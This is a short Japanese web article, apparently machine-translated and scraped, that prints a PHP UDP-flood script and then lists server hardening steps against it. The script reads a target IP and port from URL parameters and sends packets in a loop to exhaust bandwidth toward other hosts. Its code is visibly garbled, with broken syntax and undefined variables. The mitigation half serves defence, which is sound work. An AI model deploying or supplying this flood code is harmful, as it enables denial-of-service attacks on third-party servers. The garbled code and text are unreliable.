PHP コードを使用してソケットを呼び出し、サーバーのネットワークを直接使用して他の IP を攻撃します。 一般的なコードは次のとおりです。
コードをコピーします。 コードは次のとおりです。
$ip = $ _GET['ip'] ;
$rand = $_GET['port'];
ignore_user_abort(FALSE); ;
print "フラッディング: $ip ポート $rand";
$max_time = $time+$exec_time){
$out .= "X";
}
while(1 ){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
}
}
echo ".time('h:i:s) ')." with $ packets (" .round(($packets*65)/1024, 2) . " mB) パケット平均 ".round($packets/$exec_time, 2) " packets/s \n";
?>
特徴:
IIS がオンになるとすぐに、サーバーの送信帯域幅が使い果たされます。 つまり、サーバーは他のサーバーにパケットを送信し続けます。 DDOS が大量のデータ パケットを受信し続けています。
解決策:
c:windowsphp.ini に設定します:
disable_functions =gzinflate;
c:windowsphp.ini に値を設定します。
allow_url_fopen = Off
そして:
;extension =php_sockets.dll 前に「;」記号がなければなりません。これは、socket.dll の使用を制限することを意味します
その前に「;」記号がなければなりません保持します
その後、IISを再起動してください 上記の方法がまだ機能しない場合は、IISで許可される拡張機能を選択し、PHP拡張機能のテストを禁止することができます
さらに、暗号化されていないPHP攻撃コードについては、次の方法を使用して対処することもできます。それ:
1. IP ポリシーまたはファイアウォールで、すべての UDP の送信を禁止します。
2. SQL インターセプトと URL インターセプトで、キーワード port= をインターセプトします。
http://www.bkjia.com/PHPjc/322894.html
www.bkjia.comtrue
http://www.bkjia.com/PHPjc/322894.html
技術記事
PHP コードを使用してソケットを呼び出し、サーバーのネットワークを直接使用して他の IP を攻撃します。 次のようにコードをコピーします。 $ip = $_GET['ip']; ['ポート' ]; set_ti...